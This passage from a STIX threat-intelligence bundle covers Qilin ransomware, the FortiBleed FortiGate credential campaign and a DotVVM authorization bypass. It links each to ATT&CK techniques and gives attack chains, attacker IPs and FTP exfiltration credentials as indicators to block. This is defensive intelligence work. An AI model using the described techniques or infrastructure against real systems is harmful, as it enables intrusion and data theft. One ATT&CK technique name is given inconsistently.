      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--23fd2f76-f443-5313-a13b-6fce0448d47e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--da26685a-06ae-5445-a6a5-2e777dbba577",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Query Registry",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1012",
          "url": "https://attack.mitre.org/techniques/T1012"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c0dd79d6-3223-595a-988f-a5dabf0469a8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "attack-pattern--da26685a-06ae-5445-a6a5-2e777dbba577"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1021",
          "url": "https://attack.mitre.org/techniques/T1021"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e451e138-a075-5a7e-a919-c7883bfa7bdc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9ffef366-f546-510a-b87f-145fa120d579",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Other Network Medium",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--35c315db-65cd-5666-ad99-f89f78145f22",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0b30033a-fe5e-5feb-b128-27a9f2cdef65",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--be75d040-48f9-503f-902a-7fb62b161321",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Qilin"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b7d04eb5-b26d-5d37-992b-46246bfc8a30",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "target_ref": "threat-actor--be75d040-48f9-503f-902a-7fb62b161321"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--de021f9a-6b19-5c96-a477-b642a0139965",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Qilin Ransomware Claims New Victim in French Public Sector",
      "description": "## Overview\n\nThe Qilin ransomware group, first observed in July 2022, has claimed Commune d'Eyguires (www.eyguieres.org), a public sector entity in France, as its latest victim. Qilin operates a double extortion model, encrypting victim data and threatening to leak exfiltrated sensitive information if the ransom is not paid. The group's ransomware is written in Golang and allows operators to select multiple encryption modes. Since its emergence, Qilin has victimized at least 1935 organizations globally, with attacks observed since October 2022, demonstrating an average delay of 46.3 days between attack and public claim. This incident highlights the continued threat posed by ransomware groups to critical public services and the importance of robust defenses against data exfiltration and encryption.\n\n## Attack Chain\n\n1.  **Initial Access**: Qilin actors gain initial access to target environments through tactics such as phishing campaigns (e.g., spearphishing via service), exploiting publicly accessible applications (T1190), or compromising valid accounts (T1078).\n2.  **Execution \u0026 Command and Control (C2)**: Upon gaining access, attackers execute malicious code using built-in command and scripting interpreters (PowerShell, Unix Shell) to establish persistence and set up command and control (C2) channels. Tools like Cobalt Strike or SystemBC are typically used for C2, often communicating over web protocols.\n3.  **Defense Evasion \u0026 Privilege Escalation**: The group employs various techniques to evade defenses and escalate privileges, including exploiting system vulnerabilities (e.g., Bring-Your-Own-Vulnerable-Driver via Toshiba power management driver), leveraging credential dumping tools such as Mimikatz (T1003.001), and disabling security software or firewalls to reduce detection.\n4.  **Lateral Movement \u0026 Discovery**: Qilin actors move laterally across the compromised network using remote services (e.g., RDP, SMB, SSH) and tools like NetExec. They perform comprehensive discovery actions to map the network topology, identify valuable systems, and query registry for sensitive information.\n5.  **Data Collection \u0026 Exfiltration**: Prior to encryption, the group identifies and collects sensitive data from local systems. This data is often archived using native utilities (e.g., `fsutil`) before being exfiltrated to attacker-controlled infrastructure or cloud storage services like EasyUpload.io, MEGA, or FTP servers.\n6.  **Impact - Encryption \u0026 System Impairment**: The final stage involves deploying the Golang-based ransomware payload to encrypt target data, rendering systems inoperable and files inaccessible (T1486). The threat actors also inhibit system recovery mechanisms and may perform disk wipes (T1490) to ensure data irrecoverability, reinforcing their double extortion strategy.\n\n## Impact\n\nThe Qilin ransomware group's attacks result in severe operational disruption and significant financial burdens due to system downtime, recovery costs, and potential ransom payments. Beyond encryption, the double extortion model means sensitive data exfiltrated from victims, such as Commune d'Eyguires in the public sector, is threatened with public release on their leak site. This can lead to severe reputational damage, loss of public trust, and potential regulatory fines due to data breaches, impacting critical services provided by the affected organizations. With 1935 victims globally across sectors like public sector, manufacturing, and healthcare, the financial and operational impact is substantial and widespread.\n\n## Recommendation\n\n*   Deploy the provided Sigma rules to your SIEM/EDR to detect Qilin ransomware activity, specifically focusing on file system events, process creation, and network connections.\n*   Block the FTP exfiltration domains `dataShare:2bTWYKNn7aK7Rqp9mnv3@176.113.115.209` and `dataShare:nX4aJxu3rYUMiLjCMtuJYTKS@176.113.115.97` at your network perimeter firewall and proxy servers.\n*   Implement strong logging for `process_creation`, `file_event`, and `network_connection` to enable the detection rules and facilitate incident response.\n*   Filter network traffic to block connections to the identified malicious IP addresses: `176.113.115.209`, `176.113.115.97`, `188.119.66.189`, `31.41.244.100`, `85.209.11.49`.\n*   Regularly patch public-facing applications and systems to prevent exploitation for initial access as described in the attack chain.\n",
      "published": "2026-06-19T14:31:31Z",
      "labels": [
        "ransomware",
        "golang",
        "double-extortion",
        "public-sector",
        "france"
      ],
      "object_refs": [
        "indicator--8f9268dd-3c86-5c1b-a76d-d24745a14192",
        "indicator--142211ac-635f-509b-a2fe-7e89db11023b",
        "indicator--dfbf343a-8a79-5874-8b3f-8ac98f5b6acb",
        "indicator--c2117d72-b3f8-597d-a858-2eb3d01b7b81",
        "indicator--0d8e0286-bd04-5d17-817a-e0852042d3d7",
        "indicator--8d6d6a1a-285d-5b90-a4ed-4682d2272498",
        "indicator--d35463d5-c8de-5a78-9c27-78d2897b9e79",
        "indicator--44c5bb0a-2a38-58d4-a555-6729bfb5b005",
        "indicator--3d62a89b-4be9-50bb-b2b4-d41d41e913a6",
        "indicator--955d0adf-c373-51d6-ab72-5bb6f853fee5",
        "indicator--0b1ef0a7-132d-58ca-8ae3-2fe17085238a",
        "indicator--e461d6a1-e370-541b-a97f-8b874ad7de42",
        "indicator--a0371ac1-ae8b-5e0e-9c90-1a9b9d3b43d2",
        "indicator--08a64af7-9f02-5a99-875d-a9c5947fe56a",
        "indicator--6f78510f-3147-5d6e-a365-4052e8aece1c",
        "indicator--1fc00151-40ab-52ac-9ed7-0ba0e11e2f19",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--6587be55-e832-5b06-9b3b-4af4604cd32b",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "attack-pattern--633c0a79-a71b-5eb7-9eca-504796091337",
        "attack-pattern--da26685a-06ae-5445-a6a5-2e777dbba577",
        "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "threat-actor--be75d040-48f9-503f-902a-7fb62b161321"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.ransomware.live/group/qilin"
        },
        {
          "source_name": "reference",
          "url": "https://www.secureworks.com/research/threat-profiles/gold-feather"
        },
        {
          "source_name": "reference",
          "url": "https://www.trendmicro.com/en_us/research/24/c/agenda-ransomware-propagates-to-vcenters-and-esxi-via-custom-pow.html"
        },
        {
          "source_name": "reference",
          "url": "https://cloud.google.com/blog/topics/threat-intelligence/unc3944-sms-phishing-sim-swapping-ransomware/"
        },
        {
          "source_name": "reference",
          "url": "https://www.trendmicro.com/en_us/research/22/h/new-golang-ransomware-agenda-customizes-attacks.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a35dfc99-4204-5004-a477-9696ea8778a4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 85.11.187.8",
      "pattern": "[ipv4-addr:value = '85.11.187.8']",
      "pattern_type": "stix",
      "valid_from": "2026-06-19T14:46:20Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aaec3600-7db6-5eeb-9b27-ec82d83f9ff1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d5fea853-2c1a-5eb9-9926-18c21b07c21d",
      "target_ref": "indicator--a35dfc99-4204-5004-a477-9696ea8778a4"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9cbe97d7-b81a-5c6d-99ea-2f0b6c1318ca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d5fea853-2c1a-5eb9-9926-18c21b07c21d",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--15839989-fc89-5a1a-a1e7-b631f4f3f8ed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d5fea853-2c1a-5eb9-9926-18c21b07c21d",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Brute Force",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1110",
          "url": "https://attack.mitre.org/techniques/T1110"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--063b1137-ac30-5515-897c-ab749354885c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d5fea853-2c1a-5eb9-9926-18c21b07c21d",
      "target_ref": "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1087",
          "url": "https://attack.mitre.org/techniques/T1087"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5d5bb41c-92bf-5ffe-95a0-3f36e95dcda4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d5fea853-2c1a-5eb9-9926-18c21b07c21d",
      "target_ref": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1021",
          "url": "https://attack.mitre.org/techniques/T1021"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ad5cf616-9476-55f2-91ba-56858a343ac4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d5fea853-2c1a-5eb9-9926-18c21b07c21d",
      "target_ref": "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f2399929-3a75-5cc9-b371-b376c020c578",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d5fea853-2c1a-5eb9-9926-18c21b07c21d",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c20bfdb6-7cf3-5adf-868e-269dd1b81612",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d5fea853-2c1a-5eb9-9926-18c21b07c21d",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Indicator Removal",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1070",
          "url": "https://attack.mitre.org/techniques/T1070"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--efda6289-ca7f-51c6-8927-ae2facfa372c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d5fea853-2c1a-5eb9-9926-18c21b07c21d",
      "target_ref": "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--95a6f2c3-39bf-5135-94b2-1bcab9a5a2c4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Russian-speaking threat group"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1aaacd62-0003-517d-92d9-2b5175e345c3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--d5fea853-2c1a-5eb9-9926-18c21b07c21d",
      "target_ref": "threat-actor--95a6f2c3-39bf-5135-94b2-1bcab9a5a2c4"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d5fea853-2c1a-5eb9-9926-18c21b07c21d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "FortiBleed Campaign: 73,932 FortiGate Systems Credentials Exposed",
      "description": "## Overview\n\nA Russian-speaking threat group has been attributed to the \"FortiBleed\" campaign, which involves a massive dataset containing valid administrative and SSL VPN credentials for approximately 73,932 Fortinet FortiGate firewalls across 194 countries and over 21,600 domains. Disclosed on June 13, 2026, by researcher Volodymyr Diachenko, this campaign leverages credentials likely obtained from exported FortiGate configuration files and active credential harvesting against FortiGate and MSSQL systems. The threat group used a 45-GPU cluster for offline hash cracking, enabling access to sensitive internal networks, including government, critical infrastructure, and multinational corporations. The scope and verified authenticity of these credentials make this a high-priority incident, as many affected devices remain online and internet-exposed, posing an immediate threat of espionage and data exfiltration.\n\n## Attack Chain\n\n1.  **Credential Harvesting \u0026 Exposure**: Threat actors obtained a dataset comprising FortiGate administrative and SSL VPN credentials, likely sourced from exposed FortiGate configuration files and hashes intercepted during large-scale credential attempts (1.16 billion against FortiGate, 2.1 billion against MSSQL).\n2.  **Offline Credential Cracking**: A 45-GPU cluster managed through Hashtopolis was utilized to crack the collected SSL VPN authentication hashes, successfully recovering plaintext administrative and VPN credentials.\n3.  **Initial Access with Valid Accounts**: Using the recovered plaintext credentials, threat actors gained unauthorized access to FortiGate management interfaces and internal Active Directory environments.\n4.  **Lateral Movement \u0026 Discovery**: Once inside, attackers deployed Active Directory and LDAP enumeration scripts (e.g., `ad_enum.py`, `ad_full_audit.py`) and performed password spraying (`spray_*.sh`, `spray_*.py`) to expand their access and identify additional targets and sensitive data within the network.\n5.  **Data Collection \u0026 Staging**: SMB/DFS collection scripts (e.g., `backup_dfs.py`, `spider.py`) were used to identify and gather sensitive data across the network, potentially staging it for exfiltration.\n6.  **Data Exfiltration**: Classified documents and other sensitive information were exfiltrated from compromised organizations, including a Turkish NATO defense contractor.\n7.  **Defense Evasion**: Threat actors employed log-clearing markers to remove traces of their activity from compromised systems, hindering detection and forensic analysis.\n\n## Impact\n\nThe FortiBleed campaign has resulted in the exposure of credentials for 73,932 FortiGate firewall URLs across 194 countries and over 21,600 domains. Verified compromises include organizations in government, telecommunications, financial services, healthcare, manufacturing, and critical infrastructure sectors, with reported impacts in Japan, Taiwan, Vietnam, Iraq, and Türkiye. A Turkish NATO defense contractor suffered exfiltration of classified documents, highlighting the potential for state-sponsored espionage. The offline nature of credential cracking means initial credential theft may not be logged, making detection of the initial compromise challenging. Continued online exposure of affected devices with verified credentials poses an ongoing, severe risk.\n\n## Recommendation\n\n*   Rotate all FortiGate administrative and SSL VPN credentials immediately, especially for those identified as exposed.\n*   Enforce multi-factor authentication (MFA) on all FortiGate remote and administrative access points to mitigate the impact of compromised credentials.\n*   Deploy the Sigma rule \"Detect Malicious IP in Network Connections\" to identify and block traffic associated with `85.11.187.8` at your network perimeter.\n*   Deploy the Sigma rule \"Detect Execution of AD/Credential Enumeration Scripts\" to your Windows endpoints to alert on post-exploitation activity involving `ad_enum.py` or similar scripts.\n*   Deploy the Sigma rule \"Detect Creation/Modification of FortiBleed Attack Tools\" to monitor file system activity for the presence of attacker tools like `fg_capture.log` or `bot.py`.\n*   Review Fortinet logs for unusual login attempts, administrative sessions, configuration changes, and newly created accounts.\n*   Restrict or remove internet exposure for FortiGate management interfaces to reduce attack surface.\n*   Patch FortiOS to the latest available version to address any underlying vulnerabilities that might have facilitated configuration file exposure.\n",
      "published": "2026-06-19T14:46:20Z",
      "labels": [
        "credential-theft",
        "fortigate",
        "fortios",
        "state-sponsored",
        "espionage",
        "data-exfiltration",
        "russian-speaking",
        "critical-infrastructure",
        "government"
      ],
      "object_refs": [
        "indicator--a35dfc99-4204-5004-a477-9696ea8778a4",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51",
        "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
        "attack-pattern--e26451c2-381a-5681-88b3-9fe88c4d5e5a",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
        "attack-pattern--0856bd82-6dcb-584e-bbac-9f484aa79d34",
        "threat-actor--95a6f2c3-39bf-5135-94b2-1bcab9a5a2c4"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.recordedfuture.com/blog/critical-fortibleed-campaign"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6276c642-266d-57e3-b269-b3ebe868890e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d144146a-f90c-5fdf-81bb-b71cc257b84b",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0880834b-2dd1-58f4-99f4-41749f867d88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--d144146a-f90c-5fdf-81bb-b71cc257b84b",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--d144146a-f90c-5fdf-81bb-b71cc257b84b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "DotVVM AuthorizeActionFilter Critical Authorization Bypass",
      "description": "## Overview\n\nA critical authorization bypass vulnerability (GHSA-c8qj-jx8j-fg2w) has been identified in the `AuthorizeActionFilter` class within the DotVVM framework. This flaw affects all users who have implemented the `AuthorizeActionFilter` to secure parts of their web applications. The component, intended to enforce access controls, is inherently flawed and performs no actual authorization checks, effectively allowing any request to bypass the filter and access protected resources. This vulnerability does not require complex 'hacking' techniques; an attacker simply needs to make a standard request to a supposedly protected endpoint, and the filter will mistakenly grant access. This flaw impacts DotVVM versions prior to 4.2.11, between 4.3.0-preview01-final and 4.3.15, and between 5.0.0-preview01-final and 5.0.0-preview09-final.\n\n## Attack Chain\n\n1.  **Attacker identifies target application:** An attacker identifies a web application that is developed using the DotVVM framework.\n2.  **Vulnerability discovery:** The attacker becomes aware of the `AuthorizeActionFilter` authorization bypass vulnerability (GHSA-c8qj-jx8j-fg2w) in DotVVM, understanding its nature as a complete bypass.\n3.  **Endpoint identification:** The attacker probes or researches the target application to identify specific web application endpoints or functionalities that are intended to be protected by the vulnerable `AuthorizeActionFilter` (e.g., `/admin`, `/dashboard`, `/api/users`).\n4.  **Craft unauthorized request:** The attacker crafts a standard HTTP GET or POST request to one of these identified protected endpoints, intentionally omitting or providing insufficient authentication or authorization tokens.\n5.  **Application processes request:** The vulnerable DotVVM application receives and processes the crafted HTTP request, routing it to the appropriate controller action.\n6.  **Filter execution (no check):** The `AuthorizeActionFilter` component, despite being invoked for the protected endpoint, executes without performing any authorization validation due to its internal flaw, effectively doing nothing.\n7.  **Unauthorized access granted:** The DotVVM application, mistakenly assuming authorization has occurred, proceeds to execute the action and grants the attacker full access to the intended protected resource or functionality.\n8.  **Impact achieved:** The attacker successfully bypasses security controls, leading to unauthorized data exposure, privilege escalation, or the ability to perform restricted actions within the compromised application.\n\n## Impact\n\nAll applications utilizing the `AuthorizeActionFilter` class within the specified vulnerable DotVVM versions are at critical risk. The complete failure of the filter to perform any authorization checks means that any resource or functionality intended to be protected by it is openly accessible to unauthorized individuals. This directly leads to unauthorized access to sensitive data, compromise of administrative functions, or complete takeover of application features that were meant to be restricted. The number of potentially affected applications is widespread among DotVVM users who relied on this specific authorization mechanism for security.\n\n## Recommendation\n\n*   **Patch immediately:** Upgrade all affected DotVVM installations to a patched version (DotVVM 4.3.15, 4.2.11, or 5.0.0-preview09) to remediate the GHSA-c8qj-jx8j-fg2w vulnerability.\n*   **Implement workaround:** For immediate protection if patching is not feasible, replace all instances of `AuthorizeActionFilter` with `AuthorizeAttribute` in your DotVVM application code.\n*   **Monitor webserver logs:** Deploy the Sigma rules \"Detect Successful Access to Common Sensitive Web GET Paths\" and \"Detect Successful Access to Common Sensitive Web POST Paths\" to monitor for HTTP 200 responses to known administrative or sensitive URIs, as this can indicate potential unauthorized access.\n*   **Application-level logging:** Implement robust application-level logging for all sensitive actions and authorization events to identify successful access to resources that should require specific permissions.\n",
      "published": "2026-06-19T15:15:34Z",
      "labels": [
        "authorization-bypass",
        "web-application",
        "vulnerability",
        "dotvvm"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-c8qj-jx8j-fg2w"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d22e947-f5b5-5413-afc0-4129fd64c345",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Cloud Administration Command",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1651",
          "url": "https://attack.mitre.org/techniques/T1651"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d0584481-8010-5602-9218-da738a681ae2",
      "created": "2026-07-09T17:20:22Z",
